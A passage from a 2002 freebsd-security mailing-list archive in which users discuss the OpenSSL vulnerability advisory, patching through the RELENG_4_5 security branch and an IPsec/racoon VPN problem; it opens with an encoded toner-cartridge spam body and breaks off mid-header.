L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPkl0ZW0gIzImbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5FcHNv biBFUEw3MDAwLzgwMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5TMDUxMjAwJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEwNSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ UGFuYXNvbmljIDkwLzk1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+LS0tLS0tLS0t LS0tLS0tLT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj4NCjxwPjx1 Pjxmb250IHNpemU9KzM+U29ycnksPC9mb250PjwvdT48Zm9udCBzaXplPSsyPiZuYnNwOyBTdGls bCBubyBJbmtqZXRzLA0KYnViYmxlIGpldHMgb3IgWGVyb3ggaW4gc3RvY2s8L2ZvbnQ+DQo8YnI+ Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8cD48dT48Yj5ESVNDTEFJTUVSUzwvYj46 PC91Pg0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IEFsbCB0cmFkZW1hcmtzLCBicmFuZCBu YW1lcyBhbmQgZGlhZ3JhbXMgbGlzdGVkDQpvciBzaG93biBhYm92ZQ0KPGJyPmFyZSBwcm9wZXJ0 eSBvZiB0aGVpciByZXNwZWN0aXZlIGhvbGRlcnMmbmJzcDsmbmJzcDsgYW5kIHVzZWQgZm9yIGRl c2NyaXB0aXZlDQpwdXJwb3NlcyBvbmx5DQo8YnI+LldlIGRvIG5vdCBjYXJyeSBhbnkgSFAgT0VN Jm5ic3A7IFByb2R1Y3RzLg0KPHA+PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+PHU+Tk9URVM8 L3U+OjwvZm9udD4NCjxwPlVuaXZlcnNpdHkgYW5kIFNjaG9vbCBQdXJjaGFzZSBvcmRlcnMgd2Vs Y29tZS4gKE5vIENyZWRpdCBhcHByb3ZhbCByZXF1aXJlZC4NCkFsbCBvdGhlciBQdXJjaGFzZQ0K PGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBvcmRlcnMgcmVxdWlyZSBjcmVkaXQgYXBwcm92YWwNCjxi cj4mbmJzcDtQYXkgYnkgY2hlY2sgKEMuTy5ELiksIENyZWRpdCBjYXJkIG9yIHB1cmNoYXNlIG9y ZGVyIChOZXQgMzANCkRheXMpDQo8YnI+U2hpcHBpbmcgY2hhcmdlcyBzdGFydCBhdCAkNC41IHBl ciBjYXJ0cmlkZ2UuIEFkZCAkMS41IGZvciBlYWNoIGFkZGl0aW9uYWwNCmNhcnRyaWRnZS4gQ2Fy dHJpZGdlcw0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBkZWxpdmVyZWQgYnkgRmVkZXJhbCBFeHBy ZXNzIHdpdGhpbiAyIHRvIDUgd29ya2luZw0KZGF5cyBkZXBlbmRpbmcgb24geW91ciBsb2NhdGlv bi4NCjxicj5TaGlwcGluZyBhbmQgYmlsbGluZyBhZGRyZXNzZXMgYXJlIHJlcXVpcmVkIGZvciBQ dXJjaGFzZSBPcmRlciB0cmFuc2FjdGlvbnMuDQpZb3VyIGludm9pY2Ugd2lsbA0KPGJyPiZuYnNw OyZuYnNwOyZuYnNwOyBiZSBhdHRhY2hlZCB0byB5b3VyIHBhY2thZ2luZy4gUGxlYXNlIHBlYWwg YW5kIHBheQ0Kd2l0aGluIDMwIGRheXMuDQo8YnI+MzAgZGF5IHN0YW5kYXJkIHJldHVybiBwb2xp Y3kgKG1vbmV5IGJhY2sgZ3VhcmFudGVlKSBvbiBhbGwgbWVyY2hhbmRpc2UuDQo5MCBkYXkgdW5s aW1pdGVkIGV4Y2hhbmdlIHBvbGljeQ0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBmb3IgZGVmZWN0 aXZlIG1lcmNoYW5kaXNlPGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+LjwvZm9udD4NCjxwPjxi Pjx1PkVYQ0xVU0lPTlM6PC91PjwvYj4NCjxwPjx1PldlIGRvIG5vdCBjYXJyeTo8L3U+DQo8cD4m bmJzcDsmbmJzcDsmbmJzcDsgLSBYZXJveCwgQnJvdGhlciwgUGFuYXNvbmljLCBvciBGdWppdHN1 IFByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7IC0gRGVza2pldC9JbmtqZXQgb3IgQnVi YmxlamV0IHByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IC1BbnkgT2ZmYnJh bmRzIGJlc2lkZXMgdGhlIG9uZXMgbGlzdGVkIGFib3ZlLg0KQWxsIGNhcnRyaWRnZXMNCjxicj4m bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgYXJl IGNvbXBhdGlibGUNCmhpZ2ggeWllbGQgcHJvZHVjDQo8YnI+PGZvbnQgZmFjZT0iQnJ1c2hTY3Jp cHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+ PC9mb250PiZuYnNwOzxmb250IA0KZmFjZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIj RkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+PC9mb250Pg0KPHA+PGZvbnQgZmFj ZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0Pkhh dmUNCmEgZ3JlYXQgZGF5ISE8L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCg0KPHA+PGJy Pg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0K PGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGRsPg0KPGR0Pg0KPC9kdD4NCjwvZGw+ DQoNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4m bmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxi cj4mbmJzcDsNCjwvYm9keT4NCjwvaHRtbD4NCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 23:11:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3883037B405 for ; Mon, 29 Jul 2002 23:11:51 -0700 (PDT) Received: from mail1.getin.pl (mail1.getin.pl [194.153.216.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB53343E67 for ; Mon, 29 Jul 2002 23:11:49 -0700 (PDT) (envelope-from c.nolewajka@m2mob.com) Received: from cezary ([212.244.99.70]) by mail1.getin.pl with Microsoft SMTPSVC(5.5.1877.507.50); Tue, 30 Jul 2002 08:07:49 +0200 From: "Cezary Nolewajka" To: Subject: Date: Tue, 30 Jul 2002 08:15:23 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Cezary Nolewajka Getin Sp. z o.o. mailto:c.nolewajka@m2mob.com tel.: +48 71 3475746 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 0:48:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E460A37B400; Tue, 30 Jul 2002 00:48:24 -0700 (PDT) Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3015243E6A; Tue, 30 Jul 2002 00:48:24 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020730074818.RDDD221.sccrmhc02.attbi.com@blossom.cjclark.org>; Tue, 30 Jul 2002 07:48:18 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g6U7mHJK090064; Tue, 30 Jul 2002 00:48:17 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g6U7mDbf090063; Tue, 30 Jul 2002 00:48:13 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Tue, 30 Jul 2002 00:48:13 -0700 From: "Crist J. Clark" To: Matthew Grooms Cc: dlavigne6@cogeco.ca, freebsd-questions@FreeBSD.ORG Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ... Message-ID: <20020730074813.GF89241@blossom.cjclark.org> Reply-To: "Crist J. Clark" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [Please, -questions or -security, but not both.] On Mon, Jul 29, 2002 at 02:49:22PM -0500, Matthew Grooms wrote: > Ok, Im a moron. I was trying to use the gif griver whan I shouldn't > have. I've never figured out why people use gif(4) interfaces when ESP does the tunneling for you. [snip] > When the connection is initiated from the bsd side, traffic passes > through the vpn1 box, enencrypted and routed to the remote host without > a problem. Unfotunately, the response from the remote host gets caught > up on the return trip. I am guessing this is because the bsd and vpn1 > box agree on an outbound ( from the bsd boxs perspective ) proposal but > cannot agree on an inbound proposal. The checkpoint error logs say > 'encryption failure : no response from peer'. However, here is some > tcpdump output that shows bi-directional communications. Im not sure how > to interperate this. Any ideas anyone? > > tcpdump: listening on eth0 The output from running racoon(8) with the '-d' option would be much more useful. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 6:44:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2BA3537B400 for ; Tue, 30 Jul 2002 06:44:42 -0700 (PDT) Received: from mail47.fg.online.no (mail47-s.fg.online.no [148.122.161.47]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C6BE43E4A for ; Tue, 30 Jul 2002 06:44:41 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail47.fg.online.no (8.9.3/8.9.3) with SMTP id PAA21885 for ; Tue, 30 Jul 2002 15:44:40 +0200 (MET DST) Message-ID: <004001c237cf$23c00560$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: Subject: About the openssl hole Date: Tue, 30 Jul 2002 15:43:50 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003D_01C237DF.E6BDD370" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_003D_01C237DF.E6BDD370 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Shuld we start to edit the openssl port (I have emailed the maninter to = update to 96.e, "or supply the patch from openssl" in the = /usr/ports/security/openssl), or shuld we wait for an patch from the = freebsd team ? If you look at bugtrac there are already romours about exploits flying = around now. Read the Advisory from openssl here http://www.openssl.org/news/secadv_20020730.txt Best Regards Geir R=E5ness ------=_NextPart_000_003D_01C237DF.E6BDD370 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Shuld we start to edit the openssl port = (I have=20 emailed the maninter to update to 96.e, "or supply the patch from=20 openssl" in the /usr/ports/security/openssl), or shuld we wait for = an patch=20 from the freebsd team ?
 
If you look at bugtrac there are = already romours=20 about exploits flying around now.
 
 
Read the Advisory from openssl = here
http://www.opens= sl.org/news/secadv_20020730.txt
 
 
Best Regards
Geir = R=E5ness
------=_NextPart_000_003D_01C237DF.E6BDD370-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 6:46:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B334137B408 for ; Tue, 30 Jul 2002 06:46:25 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id A8F7043E5E for ; Tue, 30 Jul 2002 06:46:24 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g6UDjgQR056422 for ; Tue, 30 Jul 2002 09:45:42 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020730094646.04e69a28@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 30 Jul 2002 09:49:03 -0400 To: security@freebsd.org From: Mike Tancsa Subject: OpenSSL security issues Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=0.0 required=7.0 tests=none version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those not on bugtraq (you should be if you are not already) looks like there are a series of vulnerabilities for openssl. More information: ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 7:57:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F17A37B405 for ; Tue, 30 Jul 2002 07:57:09 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6170643E42 for ; Tue, 30 Jul 2002 07:57:04 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g6UEuuKs017806; Tue, 30 Jul 2002 17:56:57 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g6UEuupY017805; Tue, 30 Jul 2002 17:56:56 +0300 (EEST) Date: Tue, 30 Jul 2002 17:56:56 +0300 From: Alexandr Kovalenko To: Geir R?ness Cc: freebsd-security@FreeBSD.ORG Subject: Re: About the openssl hole Message-ID: <20020730145656.GO12332@nevermind.kiev.ua> References: <004001c237cf$23c00560$fa00a8c0@elixor> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <004001c237cf$23c00560$fa00a8c0@elixor> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Geir R?ness! On Tue, Jul 30, 2002 at 03:43:50PM +0200, you wrote: [fix layout] > Shuld we start to edit the openssl port (I have emailed the maninter > to update to 96.e, "or supply the patch from openssl" in the > /usr/ports/security/openssl), or shuld we wait for an patch from the > freebsd team ? We have OpenSSL in base system and this is what, which need to be updated ASAP. > If you look at bugtrac there are already romours about exploits flying > around now. > > > Read the Advisory from openssl here > http://www.openssl.org/news/secadv_20020730.txt -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 8:21:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 19EB537B400 for ; Tue, 30 Jul 2002 08:21:14 -0700 (PDT) Received: from udmercy.edu (udmercy.edu [198.109.24.100]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7813043E4A for ; Tue, 30 Jul 2002 08:21:13 -0700 (PDT) (envelope-from allmenwf@udmercy.edu) Received: from [198.109.28.194] (account ) by udmercy.edu (CommuniGate Pro WebUser 3.1) with HTTP id 11249404 for ; Tue, 30 Jul 2002 11:21:12 -0400 From: William Allmendinger Subject: Security Branches To: freebsd-security@freebsd.org X-Mailer: CommuniGate Pro Web Mailer v.3.1 Date: Tue, 30 Jul 2002 11:21:12 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please excuse what is possiblly a very easy question. How does one find out what the latest security branch is for a particular release? In the advisory for reslov, it states to upgrade you system to the latest security branch, 4.5-RELEASE-p7. How do I find out if this is the latest one to upgrade/install from. I can't move to 4.6 yet due to an isue with the boot loader and scsi, waiting for 6.1 to see if it has a fix. These are production systems and I need them as secure and stable as possible. Thanks. ________________________________________ William F. Allmendinger Network Manager University of Detroit Mercy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 8:25:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CCDCE37B400 for ; Tue, 30 Jul 2002 08:25:51 -0700 (PDT) Received: from spxgate.servplex.com (66-105-58-82.customer.algx.net [66.105.58.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2255643E31 for ; Tue, 30 Jul 2002 08:25:51 -0700 (PDT) (envelope-from peter@servplex.com) Received: from peter.servplex.com ([192.168.0.61]) by spxgate.servplex.com (8.11.6/8.11.1) with ESMTP id g6UFWcg27544 for ; Tue, 30 Jul 2002 10:32:38 -0500 (CDT) (envelope-from peter@servplex.com) Message-Id: <5.1.0.14.2.20020730102525.00a53ec0@mail.servplex.com> X-Sender: peter@mail.servplex.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 30 Jul 2002 10:25:49 -0500 To: freebsd-security@freebsd.org From: Peter Elsner Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe peter@servplex.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 8:46:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9A9D337B400; Tue, 30 Jul 2002 08:46:55 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9A04943E4A; Tue, 30 Jul 2002 08:46:52 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g6UFkkKs018560; Tue, 30 Jul 2002 18:46:47 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g6UFkk6J018559; Tue, 30 Jul 2002 18:46:46 +0300 (EEST) Date: Tue, 30 Jul 2002 18:46:46 +0300 From: Alexandr Kovalenko To: William Allmendinger Cc: freebsd-questions@FreeBSD.org Subject: Re: Security Branches Message-ID: <20020730154646.GP12332@nevermind.kiev.ua> References: Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, William Allmendinger! On Tue, Jul 30, 2002 at 11:21:12AM -0400, you wrote: > Please excuse what is possiblly a very easy question. How > does one find out what the latest security branch is for a > particular release? In the advisory for reslov, it states to > upgrade you system to the latest security branch, > 4.5-RELEASE-p7. How do I find out if this is the latest one > to upgrade/install from. I can't move to 4.6 yet due to an > isue with the boot loader and scsi, waiting for 6.1 to see > if it has a fix. These are production systems and I need > them as secure and stable as possible. Thanks. Just track RELENG_4_5 branch. P.S. Moving to freebsd-questions as it is FAQ. -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:16:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6CC2D37B400 for ; Tue, 30 Jul 2002 09:16:26 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 1842D43E4A for ; Tue, 30 Jul 2002 09:16:25 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 9902 invoked from network); 30 Jul 2002 16:16:24 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:16:24 -0000 Date: Tue, 30 Jul 2002 18:16:57 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <170112657687.20020730181657@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re: About the openssl hole In-Reply-To: <004001c237cf$23c00560$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You wrote: GR> Shuld we start to edit the openssl port (I have emailed the maninter to update to 96.e, GR> "or supply the patch from openssl" in the /usr/ports/security/openssl), or shuld GR> we wait for an patch from the freebsd team ? Do you think you could publish the 0.9.6e port somewhere until it gets integrated into CVS? I think a lot of people could possibly use it... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:21:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CBD8037B401 for ; Tue, 30 Jul 2002 09:21:36 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 6360543E6E for ; Tue, 30 Jul 2002 09:21:35 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 10043 invoked from network); 30 Jul 2002 16:21:34 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:21:34 -0000 Date: Tue, 30 Jul 2002 18:22:07 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <137112967828.20020730182207@buz.ch> To: William Allmendinger Cc: freebsd-security@freebsd.org Subject: Re: Security Branches In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You wrote: WA> Please excuse what is possiblly a very easy question. How WA> does one find out what the latest security branch is for a WA> particular release? In the advisory for reslov, it states to WA> upgrade you system to the latest security branch, WA> 4.5-RELEASE-p7. How do I find out if this is the latest one WA> to upgrade/install from. I can't move to 4.6 yet due to an WA> isue with the boot loader and scsi, waiting for 6.1 to see WA> if it has a fix. These are production systems and I need WA> them as secure and stable as possible. Thanks. If you don't want to move to 4.6 (which I'd highly recommend if you see any chance to get it running), you should cvsup to RELENG_4_5 which is the 4.5 RELEASE + security patches branch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:23:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA31F37B400 for ; Tue, 30 Jul 2002 09:23:19 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with 